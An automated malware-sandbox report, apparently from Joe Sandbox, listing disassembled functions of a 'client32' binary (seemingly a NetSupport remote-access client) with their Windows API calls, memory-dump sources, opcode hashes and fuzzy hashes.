                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                • String ID:
                                                                                • API String ID: 398584587-0
                                                                                • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                  • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                • _free.LIBCMT ref: 1100EE64
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • _free.LIBCMT ref: 1100EE77
                                                                                • _free.LIBCMT ref: 1100EE8A
                                                                                • _free.LIBCMT ref: 1100EE9D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                • String ID:
                                                                                • API String ID: 3515823920-0
                                                                                • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                • wsprintfA.USER32 ref: 1114650E
                                                                                • wsprintfA.USER32 ref: 11146524
                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76968400,?), ref: 11143E97
                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                  • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                • API String ID: 3779116287-2600120591
                                                                                • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                                • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                                • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                                • CoUninitialize.OLE32 ref: 110F4BE6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                • String ID:
                                                                                • API String ID: 3550192930-0
                                                                                • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76968400,?), ref: 11143E97
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile$CloseHandle
                                                                                • String ID: "
                                                                                • API String ID: 1443461169-123907689
                                                                                • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,1B702977,75732EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                • String ID: Client$DisableGeolocation
                                                                                • API String ID: 3315423714-4166767992
                                                                                • Opcode ID: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                                • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                                • Opcode Fuzzy Hash: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                                • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                                Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                • TranslateMessage.USER32(?), ref: 11027850
                                                                                • DispatchMessageA.USER32(?), ref: 11027856
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                • String ID: Exit Msgloop, quit=%d
                                                                                • API String ID: 3212272093-2210386016
                                                                                • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                                • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                                Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 110179ED
                                                                                  • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 1101792C
                                                                                  • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                  • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                  • Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0
                                                                                  • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 11017842
                                                                                  • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                  • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                  • Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0
                                                                                • SetEvent.KERNEL32(0000033C), ref: 11017A0D
                                                                                • GetTickCount.KERNEL32 ref: 11017A13
                                                                                Strings
                                                                                • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                • API String ID: 3804766296-4122679463
                                                                                • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                • CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                • String ID: *AutoICFConfig$Client
                                                                                • API String ID: 3257255551-59951473
                                                                                • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                • String ID: Push
                                                                                • API String ID: 1566154052-4278761818
                                                                                • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
